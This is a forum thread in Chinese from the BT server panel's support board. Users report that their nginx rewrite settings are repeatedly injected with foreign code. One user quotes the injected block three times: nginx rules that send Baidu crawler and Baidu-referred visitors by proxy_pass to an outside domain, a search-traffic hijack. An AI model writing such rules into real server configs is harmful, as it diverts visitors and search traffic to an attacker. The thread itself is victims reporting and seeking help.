13983219162 发表于 2025-3-24 00:45:29

【已解答】nginx伪静态位置会被植入代码,请研发核对下问...

为了能快速了解并处理您的问题,请提供以下基础信息:面板、插件版本:
9.5.0正式版
系统版本:
Debian 11
问题描述:
nginx伪静态位置会被植入代码,nginx因配置错误自动暂停运行,请研发核对下问题出在哪里!一个月已经出现5此了,第一次出现的时候还给客服反馈过。客服说先停止网站,启动Nginx后,删除站点伪静态里边被植入的代码,保存后,再次启动站点就能恢复。
的确这个解决是正确的,网站能够正常运行了,但是不知道什么时候又被再次植入了。
特别提醒:被植入代码的位置是站点伪静态的0.当前 这个地方。
相关截图(日志、错误):

阿珂 发表于 2025-3-24 11:41:26


可以联系一下客户经理

303666079 发表于 2025-3-27 12:31:33

我的也被植入了,今天才发现。

13983219162 发表于 2025-3-27 23:16:39

阿珂 发表于 2025-3-24 11:41
可以联系一下客户经理

证明不是我一个人了,请研发团队引起重视。

阿珂 发表于 2025-3-28 11:50:40

请安装官方版本使用
可以联系上面的微信

13983219162 发表于 2025-3-28 22:30:08

本来就是官方免费版本升级到9.5.0正式版的

13983219162 发表于 2025-3-28 22:31:53

阿珂 发表于 2025-3-28 11:50
请安装官方版本使用
可以联系上面的微信

反馈给研发处理吧,核对下问题究竟出在哪里

阿珂 发表于 2025-4-1 12:02:01

这种情况大概使用的不是官方正版的,可以联系上面的客户经理

13983219162 发表于 2025-4-5 09:41:41

阿珂 发表于 2025-4-1 12:02
这种情况大概使用的不是官方正版的,可以联系上面的客户经理

我发誓是官网的安装的你看我是多久就开始使用bt了。会不认识官网代码?

阿珂 发表于 2025-4-7 17:20:00

请联系一下客服,一直这样回也没法解决问题

宝塔用户_hvhjqs 发表于 2025-4-8 16:02:46

我也出现这个问题。面板为8.0.5
被植入代码如下
if ($request_uri ~* "(brand|cash|cow')") {         break;   }
# 请将伪静态规则或自定义NGINX配置填写到此处

location / {
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    if ($is_baidu_spider = 1) {
      proxy_pass http://bbbbbbbbbbb.top;
      break;
    }

    if ($is_baidu_access = 1) {
      proxy_pass http://bbbbbbbbbbb.top;
      break;
    }

}

宝塔用户_hvhjqs 发表于 2025-4-8 16:04:10

我这边也遇到这个问题,面板版本8.0.5
插入代码如下
if ($request_uri ~* "(brand|cash|cow')") {         break;   }
# 请将伪静态规则或自定义NGINX配置填写到此处

location / {
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    if ($is_baidu_spider = 1) {
      proxy_pass http://bbbbbbbbbbb.top;
      break;
    }

    if ($is_baidu_access = 1) {
      proxy_pass http://bbbbbbbbbbb.top;
      break;
    }

}

宝塔用户_hvhjqs 发表于 2025-4-8 16:05:42

我这边也遇到这个问题,面板版本8.0.5
插入代码如下
if ($request_uri ~* "(brand|cash|cow')") {         break;   }
# 请将伪静态规则或自定义NGINX配置填写到此处

location / {
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    if ($is_baidu_spider = 1) {
      proxy_pass http://bbbbbbbbbbb.top;
      break;
    }

    if ($is_baidu_access = 1) {
      proxy_pass http://bbbbbbbbbbb.top;
      break;
    }

}

宝塔用户_nxxtlx 发表于 2025-4-8 16:10:56

我也发现了,而且找都找不到问题在哪里,自己开发的代码都没有被入侵

13983219162 发表于 4 小时前

宝塔用户_hvhjqs 发表于 2025-4-8 16:05
我这边也遇到这个问题,面板版本8.0.5
插入代码如下
if ($request_uri ~* "(brand|cash|cow')") {          ...

对的就是配置被植入了尾巴上的代码 很是头疼 代码都一模一样就是这代代码
页: [1]
查看完整版本: 【已解答】nginx伪静态位置会被植入代码,请研发核对下问...